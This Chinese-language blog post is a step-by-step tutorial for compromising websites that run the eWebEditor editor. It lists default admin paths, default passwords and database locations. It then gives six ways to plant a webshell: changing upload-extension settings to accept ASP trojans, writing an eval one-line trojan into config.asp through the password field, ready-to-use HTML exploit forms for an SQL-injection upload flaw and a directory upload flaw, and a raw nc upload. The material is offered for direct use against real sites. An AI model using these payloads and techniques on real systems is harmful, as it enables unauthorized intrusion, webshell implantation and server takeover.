利用ewebeditor编辑器入侵网站教程

eWebEditor编辑器
建议最好检测下admin_style.asp文件是否可以直接访问 直接到样式管理
默认后台地址:/ewebeditor/admin_login.asp

默认后台地址:/admin/eWebEditor/Admin_Login.asp

默认后台地址:/admin/WebEditor/Admin_Login.asp

默认后台地址:/admin/Editor/Admin_Login.asp

php默认后台地址:taivid_admin/eWebEditor/admin/login.php

使用默认密码:admin/admin 或 admin/admin888

不行就默认数据库路径 eWebEditor/db/ewebeditor.mdb 或eWebEditor/db/%23ewebeditor.mdb
拿webshell方法第一种方法
登陆后台点击“样式管理”-选择新增样式
只写这几样 大家照做就行了
样式名称:qxz 随便写
路径模式:选择绝对路径
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
这样我们可以上各种格式的木马 我们只要把木马改成添加的这些格式就可以了
上传路径:写上这个admin/ 或写/ 免的别人把UploadFile/目录删了 我们找不到马
内容路径:空 记得
图片限制:写上1000 免的上不了我们的asp木马
然后我们就可以提交了
就可以看到样式增加成功!
然后我们按-返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
然后按-按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
在返回样式管理-找到刚才添加的样式名称-按预览-这里回看到一个正方形的东西 我们点击
然后上传我们的刚才添加的格式的木马

拿webshell方法第二种方法
登陆后台,点击修改密码—新密码设置为 1″:eval request(“qxz”)’
设置成功后,访问asp/config.asp文件即可,一句话木马被写入到这个文件里面了.
然后用一句话客户端连接
拿webshell方法第三种方法
ewebeditor不登陆也获得webshell 这就不多说了 大家去百度搜索 ewebeditor不登陆也获得webshell
下载教程看

拿webshell方法第四种方法
利用ewebeditor asp版 2.1.6 上传漏洞利用程序
首先先看eWebEditor/upload.asp 上传地址存在不
存在的话就把下面的代码保存为
H1>ewebeditor asp版 2.1.6 上传漏洞利用程序—-</H1><br><br>
<form action=”这里写上传地址?action=save&type=IMAGE&style=luoye’ union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b’|cer’,S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name=’standard’and’a’=’a” method=post name=myform enctype=”multipart/form-data”>
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>
改上传地址保存为qxz.htm文件,打开可以直接上传CER文件,测试成功.上传后地址看源文件
就可以看到我们上传的路径和地址
拿webshell方法第五种方法
ewebeditor 鸡肋的上传漏洞
首先先看下ewebeditor/asp/upload.asp 上传地址存在不
存在就
把下面的代码
<form action=”这里写上传地址?action=savetype=image&style=popup&cusdir=a.asp” method=post name=myform enctype=”multipart/form-data”>
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>
然后保存为qxz.html
打开可以直接上传gif文件,测试成功.上传后地址看源文件
就可以看到我们上传的路径和地址
拿webshell方法第六种方法
利用eWebEditor/upload.asp
抓包和nc上传
抓包cookies 参数 和文件的数据 然后保存成文本 比如qxz.txt
然后用编译C32asm 或等等编译工具 修改
然后用nc.exe 提交 命令nc -vv site 80<qxz.txt
不懂抓包和nc上传 百度搜索相关教程
回头说下有时候进了个网站后台-看到了eWebEditor编辑器 但是找不到eWebEditor目录地址
我们来点鼠标右键-查看源代码,找到仔细找eWebEditor的路径。

原创文章转载请注明:转载自 七行者博客

本文固定链接: https://www.qxzxp.com/395.html

利用ewebeditor编辑器入侵网站教程:等您坐沙发呢!

发表评论

9 + 1 =

快捷键:Ctrl+Enter